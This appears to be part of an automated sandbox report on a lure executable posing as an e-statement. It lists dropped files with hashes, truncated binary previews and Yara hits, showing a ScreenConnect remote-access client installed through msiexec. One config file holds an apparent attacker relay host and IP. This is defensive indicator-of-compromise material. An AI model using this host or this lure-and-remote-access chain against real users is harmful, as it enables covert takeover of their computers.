                                                                                                                          SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                          SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                          SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11776
                                                                                                                          Entropy (8bit):5.273875899788767
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                                                          MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                                                          SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                                                          SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                                                          SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1721856
                                                                                                                          Entropy (8bit):6.639085961200334
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                          MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                          SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                          SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                          SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                          Process:C:\Users\user\Desktop\estatement020134230003.exe.virus.exe
                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8241152
                                                                                                                          Entropy (8bit):7.950621141303467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                                                                          MD5:DC3E43C8374222B0CA817712249AB784
                                                                                                                          SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                                                                          SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                                                                          SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8241152
                                                                                                                          Entropy (8bit):7.950621141303467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                                                                          MD5:DC3E43C8374222B0CA817712249AB784
                                                                                                                          SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                                                                          SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                                                                          SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F4AC94C9-4954-76D1-AA9E-1F00F1476998}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8241152
                                                                                                                          Entropy (8bit):7.950621141303467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:ywJ4t1h0cG5FGJRPxow8OtwJ4t1h0cG5hwJ4t1h0cG5ywJ4t1h0cG5:PWh0cGwIWh0cGkWh0cG5Wh0cG
                                                                                                                          MD5:DC3E43C8374222B0CA817712249AB784
                                                                                                                          SHA1:4C6754F6296603CB3E452549F943BEACB5783FC3
                                                                                                                          SHA-256:C08D5F6D2483AB89EC0FCB8146DC92512296886DC94CD07742EFE75D7161BB6D
                                                                                                                          SHA-512:96D29B4524F7C3E350640A94E017E77F99144C09276EC1899544FC8078C39B5EB089F307ADD1451A5CB2105CDA1023853C219C2D3A1DF17370BFECFD1B7959BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):423525
                                                                                                                          Entropy (8bit):6.578246346930916
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:9uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvD:9uH2anwohwQUv5uH2anwohwQUvD
                                                                                                                          MD5:B1856427CBB0DFA49F0147D72F83ACDB
                                                                                                                          SHA1:517F607F7030706BABA13BB356D8765904843F32
                                                                                                                          SHA-256:34076397A7F312C7C68E58CD5D7413B3612E6E1D9E02B12856A44D8FB5E643D1
                                                                                                                          SHA-512:A71750DC5983C92E729BCB5C876D7C9D1E61CFA9AC8F53FA944DB07ECCC8EDFAF63DFB2134FD6CCE5DC650B199E82B945EDDA4789C4D866410AC9750E509BBB3
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI8342.tmp, Author: Joe Security
                                                                                                                          Preview:...@IXOS.@.....@.p.Y.@.....@.....@.....@.....@.....@......&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}'.ScreenConnect Client (8d1a70ac1b2b845c)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F4AC94C9-4954-76D1-AA9E-1F00F1476998}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (8d1a70ac1b2b845c)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{0538C68F-6B94-515B-2F2F-CF0387A3F483}^.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{3F8D40B9-5B5A-1351-B0FC-58D0F623492D}f.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{007A566B-98B8-78D8-8988-2721161F84D6}c.C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileMa
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):207360
                                                                                                                          Entropy (8bit):6.573348437503042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):207360
                                                                                                                          Entropy (8bit):6.573348437503042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.171721350722867
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:JSbX72FjXEAGiLIlHVRpIh/7777777777777777777777777vDHFtw7rl0i8Q:J1EQI5wbF
                                                                                                                          MD5:1FD45EA44B96FA625DE50E0D77049A31
                                                                                                                          SHA1:F7CA8DE135E26E076E00F1DEC34C1CD2BB0036AC
                                                                                                                          SHA-256:E350AA84F586CAD10DB92411B135B3FA33A866BE36D9CF079ADD69F69D7A25D0
                                                                                                                          SHA-512:0BC1EB223BF185DD1867CA7288969F656FB544A507D40C00BE4B31175F43B1E92AAF9D846E2890300A233F2959C859A77D813DF8AAFFE3D8741F29B498529B66
                                                                                                                          Malicious:false
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.8174271012815317
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:7hM1zjT8aWpo6fL6zd+NRBkYlEq2e6kD:u1PYzpo6WaBkIT6k
                                                                                                                          MD5:A5AD3FDFC038F38EAC2E01BAB4997D14
                                                                                                                          SHA1:089BBC2AE23F3525C2C20114BED987A94F09C1A5
                                                                                                                          SHA-256:6FA0608162FDA5D7D6FD2447E38C03E504B401F99388DD8209D5914897E4A79C
                                                                                                                          SHA-512:EF75F73B6715EADB056D2959689C50666FE08EC2BA96E51662F4C93A3B145340E4E1011275CC466890AF2935D4E46BE92EDE232F48CADFACE249B4519D45031B
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):435
                                                                                                                          Entropy (8bit):5.289734780210945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                                          MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                          SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                          SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                          SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                          Malicious:false
                                                                                                                          Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):432221
                                                                                                                          Entropy (8bit):5.375168171707261
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaus:zTtbmkExhMJCIpErh
                                                                                                                          MD5:F9BEFC015A4C1F510BFBC0B4F5D3F75D
                                                                                                                          SHA1:99AC5628C665676D3397EF2EB249141D10EF28EF
                                                                                                                          SHA-256:B8D08A45940B8A999080CE2F659E1CA10C187B4CA9236AF02EC956CF41A7CD0A
                                                                                                                          SHA-512:6ED8D189539ADDFE2BF9ADA3A3E919E3CCCB3A67F132CC825210867E91F1696F4837A799CFFD0B9AF018AF8041689C5487A3BDB766FC895C3CD7C877B4DDE8D1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):573
                                                                                                                          Entropy (8bit):5.03215333054615
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOMwMpm/vXbAa3xT:2dL9hK6E46YPiYvH
                                                                                                                          MD5:983A5035AEF28C831FA1594A88A44987
                                                                                                                          SHA1:81CFE6D884F9C48BC59B3FD63FABAFE09612D054
                                                                                                                          SHA-256:0E9D1344A73B679E1F1F1B8609391431CD6ECB5A2AE1F16BF1C92525817FDC70
                                                                                                                          SHA-512:60CE40EBB7FD5295111EF6F8BDB229760C08F278F94B6EAE59095C7AFAD38BFE2BFFA0EB8835E617C7790C5DCF7E39101D244DD6CA4A97A336D55A4C25488818
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>learnskillboosts.con-ip.com=195.250.25.144-05%2f12%2f2024%2019%3a00%3a08</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):573
                                                                                                                          Entropy (8bit):5.03215333054615
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOMwMpm/vXbAa3xT:2dL9hK6E46YPiYvH
                                                                                                                          MD5:983A5035AEF28C831FA1594A88A44987
                                                                                                                          SHA1:81CFE6D884F9C48BC59B3FD63FABAFE09612D054
                                                                                                                          SHA-256:0E9D1344A73B679E1F1F1B8609391431CD6ECB5A2AE1F16BF1C92525817FDC70
                                                                                                                          SHA-512:60CE40EBB7FD5295111EF6F8BDB229760C08F278F94B6EAE59095C7AFAD38BFE2BFFA0EB8835E617C7790C5DCF7E39101D244DD6CA4A97A336D55A4C25488818
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>learnskillboosts.con-ip.com=195.250.25.144-05%2f12%2f2024%2019%3a00%3a08</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1590
                                                                                                                          Entropy (8bit):5.363907225770245
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                          MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                          SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                          SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                          SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):1.4321547089312856
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:AppkuTrh8FXzJT5aU/t95UyB7qcq56Adu0U6SiL6zd+AfjKRBf8Yl/T4wM02NoKJ:SkZ3ToBaWpo6fL6zd+NRBkYlEq2e6kD
                                                                                                                          MD5:60273BCE3676EEBE01F7EDF76DDDBC2A
                                                                                                                          SHA1:4A2EC2ACFE86A7D37778F9488A7625EE5B3DAE16
                                                                                                                          SHA-256:43479D2A939BE897389C56382A2C570B58E58ACCE3CF444209CD9E69C1F86859
                                                                                                                          SHA-512:0D4DA5D08EF3FC5752A2CAB7AE9F34008E5BEBA163E84660BD50FCF711C5A54EFB2CA018195507B5F9F0070A84DB7BFC22C7AE3490F8F5C362C83F2EE6A46DD7
